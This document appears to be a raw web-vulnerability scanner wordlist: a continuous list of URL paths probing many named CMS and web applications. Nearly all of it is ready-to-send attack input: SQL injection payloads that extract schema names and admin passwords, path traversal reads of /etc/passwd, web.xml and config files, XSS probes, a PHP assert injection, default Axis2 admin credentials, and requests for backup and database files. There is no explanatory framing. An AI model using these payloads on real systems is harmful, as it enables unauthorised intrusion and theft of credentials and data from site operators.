/api/uc.php?code=8e347f1oWfxZ5isPSs7QBbA78aaJwxZCvdIIfY2niRLsrqrg0dHBfrkRSaOtzGxkncaWtRGPVKjVbHwZJSlI1JFH9WBN5wj%2Fsqj2Xg /api/uc.php?code=c2f4ZUxs8zoTQY250F1rAWrUX3HdH02DmJ%2B35SmPeYiZ4McfmrkhoXXy9iGUKw86jzY%2B%2F43CtUlnJtwQFcGhRIgJlqvJeZbHGdNSNyMC2VT9SjlxPpWveWUzynqY4%2FQnruPHVh%2FTxtjrrdBZhZXOqEDm1JBEB10PlawipFuTPtFKt08G2MSMWRRL5dKcXsmwIXKj4YJH%2BBD4cnwYwZVvqyjSTqMoB9nB6xYfwhedhJp%2B6Y%2BC5ZgHq0QnvYCmgGcHds1hKQDzp7vnEnyQSrFIZsfMTpbTIU8jrGOqBg /api/uc.php?code=e58bJh4lGn7%2F87F38CD3nphwoQNenQoOElYFu9%2FBvZV2gsgxPnmRmq3iJZcx%2FF1LPelzduVe3ZFJOD4Y0vpB388niaie8ECa%2FYA%2BqA13TPGzW5EpO%2FHaShEiHdaEqgyeRf%2Bh1EBCq3UASAPet%2BTI4R8tIKfU05ENmo5bK8Fj6DHvC9%2BtIksTeaOgmBzDwHdMbbLQwjGtvauIjUNnf2FglhdFD3mQdDiOq2rSSWxWPkQEYV0Z5ihe2YhVrmUlAVJqSshZ3wh5zdfjWzCUnP4I7k3f%2B2khp64tgUEbwIdcoV38Ei47PSd5h02j9uBvIs7yg%2ByfJ7zp5ArNiq3wuDcy9LtAXup68g /api/uc.php?code=fd92NqvC0fvDd3K8T4F9wiNlGHGg%2Bz13GSxyds04jK36mfZacZwYY5bVdHPO0hSTj4Zd4Q7mhGp70q%2BosC6PYhZZQxKJp3vOR5z5SQ /api/uc/uc.php?code=380dDbp0QmFDGmUR2ENTw7v%2B1YVER%2BKFyWB3YQN0OARXAr%2BIV4p1g3Ou5yA2CG6k%2BYdUOSb%2BwsiMwU4aqz2Gmtae60ut%2Fw /api/upload/swfthumbnail.php?id=../../include/common.inc.php /apps/include.php?file=index.php /article.php?act=list&catid=0&keyword=%d5'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,schema_name,0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23 /article/file/?method=out&file=../../../../application/config/config.ini.php /article/file/cid/-306/?file=../../../../../../../../../../etc/passwd&method=in /asearch.do?status=showpage&LanguageType=1%27%20UNION%20ALL%20SELECT%20NULL%2Cchar%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29%2CNULL%2CNULL--%20 /ask/search_ajax.php?q=s%bb%27 /asord/asord_searchresult.php?type=02')%20UNION%20ALL%20SELECT%20CHR(113)%7C%7CCHR(98)%7C%7CCHR(109)%7C%7CCHR(121)%7C%7CCHR(113)%7C%7CCHR(107)%7C%7CCHR(97)%7C%7CCHR(58)%7C%7CCHR(97)%7C%7CCHR(58)%7C%7CCHR(97)%7C%7CCHR(113)%7C%7CCHR(76)%7C%7CCHR(89)%7C%7CCHR(76)%7C%7CCHR(113)%7C%7CCHR(103)%7C%7CCHR(116)%7C%7CCHR(100)%7C%7CCHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&q=312321 /aspnet/ /attachment.php?infloat=yes&handlekey=123);alert(/webscan/);// /avcon/av_downavstream/streamoforg/selectd.php?get=11234 /axis2/axis2-admin/login?userName=admin&password=axis2&submit=+Login+ /backup/ /baseNews_view.jsp?newsId=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20-- /basket.asp?h%77_id=513%20and%201=2 /besthr/index.php?type=1%20and%20@%60%5C'%60%20or%20ascii(substring((select%20a_user%20from%20job_admin),1,1))=97%20%23@%60%5C'%60 /bit-xxzs/xmlpzs/bsdetail.asp?id=-306'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20-- /bit-xxzs/xmlpzs/builddetail.asp?buildid=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20-- /bit-xxzs/xmlpzs/fwsyqdetail.asp?certno=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20-- /bit-xxzs/xmlpzs/nowdetail.asp?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20-- /bit-xxzs/xmlpzs/ysxkdetail.asp?permitsaleno=-306'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20-- /biz.php?ctl=user&act=register&step=4&sid=1%20and%200%20union%20select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,md5(1122),27,28 /blue_show.aspx?paperName=hehe'%20and%201=(select%20char(106))%20--&qnum=20 /bom.php?dir=. /bookdetail.aspx?id=-311%20union%20all%20Select%208%2CCHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8-- /boot/phpConfig/tb_admin.txt /bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=%27%2b+(select+convert(int%2c(CHAR(106)%2bCHAR(79)))+FROM+syscolumns)+%2b%27 /bqbzDetail.do?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122 /broadcast/displaynewspic.aspx?id=1/**/and/**/1=char(106)/**/ /browse/browse_user_db.php /bugfree/install/index.php?action=upgraded /bulletin/bulletin_template_show.aspx?id=(select%20char(86)) /burgherServiceDetail.do?bs=1&serviceType=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122 /business/buildingrooms_xml.asp?cancelBldroomShow=2&client_buildID=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&client_mainno=0&client_mainTable=unrelatedresource&client_realtypeID=-1&client_showMode=&client_showRoomCond=&client_stanID=1610&floorEnd=-100&floorStart=-100&functiontype=6&pmBldRoomID=undefined&roomNoEnd=-100&roomNoStart=-100&sid= /cache/bak_mysql.txt /cacti.sql /cai_study.asp?FN=cai/test.flv&cls_no=&cai_no=lzgy&stu_no=1122'%20and%201=char(106);-- /caigou/NoticeList.aspx?Type=%27%2b+(select+convert(int%2cCHAR(106)%2bCHAR(105)%2bCHAR(120))+FROM+syscolumns)+%2b%27 /capturedownload.php?action=1&picpath=config.ini /card.php/login.php/login.php/login.php/login.php?cardNumber=-1%27%20UNION%20SELECT%201,md5(0x045154),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%23 /card_search.php/login.php/login.php/login.php?cardNumber=-1'%20UNION%20SELECT%201,md5(0x045154),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%23 /card_sold_print.php/login.php/login.php/login.php?ID=9999999999'%20UNION%20SELECT%201,md5(0x045154),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%23 /cart.aspx?act=buy&bindingid=1%20and%201=char(106)-- /cart.aspx?act=spikebuy&spikeid=3%20and%201=char(106)%2bchar(120)%20-- /cartstep1.aspx?act=area&id=@@version /case/?settings[met_img]=met_admin_table%20where%201=1%20--%201 /category/xwxc/p/p/p/p/p/p/p/$%7B@assert(exit(md5(0x41545)))%7D/p/p/1.html /cctrl/admin/news/contShow.php?id=2'%20and%20(select%201%20from%20%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a);%23 /cctrl/admin/news/contShow.php?id=2'%20and%20(select%204391%20from(select%20count(*),concat(0x7e,(mid((ifnull(cast(md5(0x4515)%20as%20char),0x20)),1,50)),0x7e,floor(rand(0)*2))x%20from%20information_schema.character_sets%20group%20by%20x)a)%20and%20'1'='1 /cctrl/admin/purview/purview.php /cctrl/backup/index.php /celerityAlleywayDetail.do?type=7'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd /celive/js/include.php?departmentid=webscan'&cmseasylive=1 /centreon/include/views/graphs/graphStatus/displayServiceStatus.php?session_id='%20or%201=1%20--%20/**&template_id='%20UNION%20ALL%20SELECT%201,2,3,4,5,CHAR(59,%2032,%2099,97,116,32,47,101,116,99,47,112,97,115,115,119,100,%2059),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20--%20/**%20 /cfg/user.cfg.ini /cgi-bin/ /cgi-bin/admin/configfile.cgi /cgi/index.cgi?error=badlogin&__mode=show_login%27%22%28%29%26%25%3CScRiPt%20%3Ealert%2842873%29%3C%2fScRiPt%3E /channel/QueryHig.aspx?AcceptDept=&AppBusinessName='/**/and/**/char(106)%3E0/**/%20--%20 /cjcx/bkxt/xxpj.asp?id=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58)) /cjcx/bkxt/yqts1.asp?newsid=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58)) /cjcx/kagx/main3.asp?rjxk=dd'%20and%201=(CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))%20--&xqmc=%25&jsxm=&mc=&ktlx=&page= /cjcx/xuesheng/czjl/shuru.asp?id=-28%20UNION%20ALL%20SELECT%20CHAR(106)%2bCHAR(106)%2bCHAR(106)%2bCHAR(58)%2bCHAR(58)%2bCHAR(100)%2bCHAR(100)%2bCHAR(60)%20--&xueke= /cjwtlist.aspx?t=(select+convert(int%2c@@version)) /class.php?action=news&do=39&dpid=68&m=(SELECT%201833%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&todo=station /client/checkuser.aspx?user=test'%20and%20char(106)%3E0--&pwd=1 /cms/ad/column_tree_xml_admin.jsp?_web_id=1'%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x7179647371,0x6141534f415555665645,0x717a687371),NULL,NULL,NULL,NULL,NULL%23 /cms/cms/infopub/gjjs.jsp?pubtype=S&pubpath=dkt&startdate=&enddate=&topic=&content=&authorname=&origin=&description=&webappcode=A02&searchdir=A02&templetid=-21'%20union%20all%20select%20char(106)%2bchar(62)%2bchar(60),null,null%20-- /cms/cms/webapp/search/search-conf.jsp?appid=1&func=loadcol&webid=main'%20UNION%20ALL%20SELECT%20NULL,NULL,CHR(72)%7C%7CCHR(75)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL-- /cms/common/tree_json_data.jsp?type=JSON_DATA_GROUPDEPTUSER&id=1'%20UNION%20ALL%20SELECT%20CHR(113)%7C%7CCHR(108)%7C%7CCHR(97)%7C%7CCHR(104)%7C%7CCHR(113)%7C%7CCHR(118)%7C%7CCHR(108)%7C%7CCHR(66)%7C%7CCHR(80)%7C%7CCHR(112)%7C%7CCHR(106)%7C%7CCHR(85)%7C%7CCHR(111)%7C%7CCHR(97)%7C%7CCHR(71)%7C%7CCHR(113)%7C%7CCHR(108)%7C%7CCHR(110)%7C%7CCHR(112)%7C%7CCHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL-- /cms/conf/system.xml /cms/framework/dbfile/createdbfile.jsp /cms/infopub/rss.jsp?channelcode=-A%27%20union%20all%20select%20char%28106%29%2bchar%28106%29%2Cnull%2Cnull%2Cnull%20--&maxnum=20 /cms/jsp/communique/zwxx_zfgb.jsp?more=1&columnNameValue=2%27%20UNION%20ALL%20SELECT%20chr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%2CNULL%2CNULL%20FROM%20DUAL--&moreZongQi=021 /cms/web/dimensionpic.jsp?action=copy&SrcPicPath=/WEB-INF/web.xml&PicPath=/cms/web/reer.txt /cms/web/jspdownload.jsp?FileUrl=%5Cetc%5Cpasswd /cms/web/jspdownload.jsp?FileUrl=c:%5Cwindows%5Cwin.ini /cms/web/testsql.jsp /cms/webapp/critic/p_criticfrontlist.jsp?TID=1'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,0x6F6B6A3A6F6B6A,NULL,NULL%23 /columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%23 /columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,md5(1122),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%23 /comm/showpic.php?pic=aHR0cDovL3d3dy5zby5jb20vcm9ib3RzLnR4dA%3D%3D /comments.php?id=3a&tablepre=boka_members+where+1%3d1+and+(select+1+from+(select+count(*)%2cconcat((select+concat(0x3a%2cmd5(1122)%2c0x3a)+from+boka_members+where+uid%3d1)%2cfloor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23 /common.asp?id=19+and+1=2+union+select+1,admin,password%2b'%7C360webscan',4,5,6+from+admin_user /common.inc /common/activeX/activeX.php?meetingId=11&userId=11/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x5E7C5E,md5(0x7765627363616e),0x5E7C5E,database(),0x7c,version(),0x5E7C5E,FLOOR(RAND(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a) /common/codeMoreWidget.jsp?code=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20-- /common/codewidget.jsp?code=1'%20AND%201=char(106)%20-- /common/edu/call.php?meetingId=11/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x5E7C5E,md5(0x7765627363616e),0x5E7C5E,database(),0x7c,version(),0x5E7C5E,FLOOR(RAND(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a) /common/edu/index.php?isGet=1&deal=contact&userId=11/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x5E7C5E,md5(0x7765627363616e),0x5E7C5E,database(),0x7c,version(),0x5E7C5E,FLOOR(RAND(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a) /common/getfile.jsp?p=..%5C%5C..%5C%5C..%5C%5C..%5C%5Cetc%5C%5Cpasswd /common/mail.php/xxx'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x5E7C5E,md5(0x7765627363616e),0x5E7C5E,database(),0x7c,version(),0x5E7C5E,FLOOR(RAND(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)/**/and/**/'1'='?a=VGsxTlpXVjBhVzVuVTJOb1pXUjFiR1U9&c=a&g=a /common/monitor/index.php?userId=111/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x5E7C5E,md5(0x7765627363616e),0x5E7C5E,database(),0x7c,version(),0x5E7C5E,FLOOR(RAND(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a) /common/web_meeting/ajax.php?module=ajaxGetGroupUserByGroupId&gId=1,(select/**/1/**/from/**/(select/**/count(*),concat(0x5E7C5E,md5(0x7765627363616e),0x5E7C5E,database(),0x7c,version(),0x5E7C5E,FLOOR(RAND(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a) /common/web_meeting/downMeetingRecord.php?name=../../../etc/passwd /company/SearchProducts.aspx?id=115&keyname=ppp%25'%20and/**/1=char(106)/**/%20--%20 /company/index.php?datetime=&page=2&position=&profession=&type=1%20and%201=2&workadd= /compare.php?goods[]=1111&goods[]=1112&goods[]=1113%22%3E%3Cscript%3Ealert(360)%3C/script%3E /complaint_re.php?cpid=-1%20UNION%20SELECT%201,2,3,4,5,concat(0x23,md5(1122),0x23),7,8,9,10%23 /conf/ /conferences/currentconf.php?deptname=-1'%20and%201=2%20UNION%20SELECT%201,concat(0x7c,md5(1122),0x7c),3,4,5,6,7,8%23 /conferences/journal.php?confid=-1%20UNION%20SELECT%201,2,concat(0x7c,md5(1122),0x7c),4,5,6,7%23 /conferences/logoconf.php?confid=-1%20UNION%20SELECT%201,concat(0x7c,md5(1122),0x7c),3,4,5,6,7,8%20%23 /config.inc.php.bak /config/ /config/cn/config.php?iDeviceID=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x3A0040003A00,IFNULL(CAST(md5(0x7765627363616e)%20AS%20CHAR),0x20),0x3A0040003A00),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20 /config/cn/config.php?iDeviceID=-1%20UNION%20SELECT%201%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%23 /config/cn/tree.php?iSub=1&id=-1%20UNION%20SELECT%201%2C2%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%23 /config/config_global.php.bak /config/config_ucenter.php.bak /config/dbconfig.ini /configright.php?nodeId=-1%20UNION%20SELECT%201%2C2%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15 /configright_decoder.php?nodeId=-1%20UNION%20SELECT%201%2C2%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12 /conformID.asp?Tid=jx'%20and%201=char(106)%20-- /conformID.asp?Tname=web'%20/**/and/**/1=char(106)-- /conn.inc /connect.inc /connect.php?receive=yes&mod=login&op=callback&referer=webscan%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);// /connect.php?receive=yes&mod=login&op=callback&referer=webscan%bf%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);// /console/ /console/login/LoginForm.jsp /content/detail.php?sid=2%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7765627363616E3A693A66696E64,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&cid=105&id=1 /content/detail.php?tid=1%20AND%20(SELECT%203047%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a) /content/index.php?cid=1%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a) /corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23 /count.php?type=news%20SET%20views%20=%20views-1%20WHERE%20id=1%20and%201=(updatexml(1,concat(0x5e24,(select%20concat(0x3a,md5(1122),0x3a)%20from%20boka_members%20where%20uid=1),0x5e24),1))--+&&action=showcount&id=1 /counter/counter2.php?id=(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(0x7e,md5(1122))%20as%20char),0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) /crossdomain.xml /ctop/person/common/get_file.jsp?file_path=//WEB-INF/web.xml /ctop/person/common/get_file.jsp?file_path=/DocumentShow.jsp /customform/CustomFormList.aspx?pageindex=1&divid=530602186870.fs_sys_user%20where%201=(select%20username%20%20from%20fs_sys_user%20where%20id=1);--.1.1 /cycle_image.php?language=999%20union%20select%201,2,3,(select%20md5(1122)%20from%20nitc_user%20limit%200,1),5,file,7,8,9,0,1%20from%20nitc_ad%23%5Een /data.mdb /data/ /data/%23data.asp /data/%23data.mdb /data/admin.mdb /data/article.mdb /data/common.inc.php.bak /data/mysql_error_trace.inc /database.inc /database/ /databases/4dsdo0/%254&764/%23fgf&0O.mdb /datacenter/ckfile.do?path=../../../../../../../../../../etc/passwd /datacenter/global/login.do?bg=../../../../../../../../../../etc/passwd /datas/ /db.inc /db/ /dealfunc/comment_js.php?cmid=1%20order%20by%2030--webscan_draGxn /deals?end_time=1&searchName=%25'%20AND%201=1%20AND%20'%25'='&start_time=1 /decodermanage.php?NodeID=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0x3A0040003A00,IFNULL(CAST(md5(0x7765627363616e)%20AS%20CHAR),0x20),0x3A0040003A00),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20 /decodermanage.php?NodeID=-11%20UNION%20SELECT%201%2C2%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%23 /dede/ /defaultroot/boardroom/iWebOfficeSign_sql/DocumentEdit.jsp?RecordID=-2074%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%28SELECT%20CONCAT%280x717765727479%2C0x3A746573743A%2C0x7168726371%29%20FROM%20ezoffice.org_employee%20LIMIT%2021%2C1%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23&Template=0&FileType=.doc&EditType=1&UserName=1&moduleType=1&saveHtmlImage=1&saveDocFile=1 /defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(106)%2bCHAR(106)%2bCHAR(58)%2bCHAR(58)%2bCHAR(108)%2bCHAR(109)%2bCHAR(110),NULL,NULL,NULL,NULL,NULL,NULL-- /defaultroot/public/select_user/search_org_list.jsp?searchName=a%27%20UNION%20ALL%20SELECT%20CONCAT%280x23%2C0x7765627363616E3A693A66696E64%2C0x23%29%2CNULL%23 /demo.php?time=alert(String.fromCharCode(52,%2050,%2056,%2055,%2051)) /deptProceedingDetailnew.do?itemtype=12%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)&depNO=jx&approveName=&nowPage=3 